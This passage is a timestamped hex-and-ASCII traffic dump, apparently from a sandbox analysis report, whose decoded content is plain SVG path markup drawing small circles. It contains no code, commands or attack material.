                                                                                                                                                                                                                                                                                        Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.28,242.85a2.18,2.18,0,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3550INData Raw: 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d
                                                                                                                                                                                                                                                                                        Data Ascii: 8,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3566INData Raw: 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 32 36 2c 31 30 39 2e 30 35 61 32 2e 31 38 2c 32 2e 31 38 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 6,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M117.26,109.05a2.18,2.18,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3582INData Raw: 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2c 31
                                                                                                                                                                                                                                                                                        Data Ascii: 1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.67,2.67,0,0,1,.2,3.62"/><path class="cls-7" d="M155,1
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3598INData Raw: 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 32 2e 37 37 2c 32 32 39 2e 35 34 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M192.77,229.54a2.17,2.17,0,0,1-1,2.83,3.18,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3614INData Raw: 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 35
                                                                                                                                                                                                                                                                                        Data Ascii: 1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M230.5
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3630INData Raw: 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: 3-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3646INData Raw: 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                                        Data Ascii: 1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.66,2.66,0,0,1,.2,3.61"/><path class="
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3662INData Raw: 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c
                                                                                                                                                                                                                                                                                        Data Ascii: ,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3678INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                                                        Data Ascii: 18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path cla
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3694INData Raw: 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 33 37 2c 31 39 34 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: ass="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.37,194.29a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3710INData Raw: 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 35 36 2c 32 33 33
                                                                                                                                                                                                                                                                                        Data Ascii: 8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.56,233
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3726INData Raw: 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2c 32 38 30 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                                        Data Ascii: 38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37.05,2.45,2.45,0,0,1,.18,3.32"/><path class="cls-9" d="M359,280.92a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3742INData Raw: 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3758INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 37 2e 36 39 2c 33 36 37 2e 35 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33
                                                                                                                                                                                                                                                                                        Data Ascii: ><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M427.69,367.56a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.3
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3774INData Raw: 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d
                                                                                                                                                                                                                                                                                        Data Ascii: 3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d=
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3790INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                                        Data Ascii: ,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3806INData Raw: 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 34 2e 36 38 2c 32 36 37 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 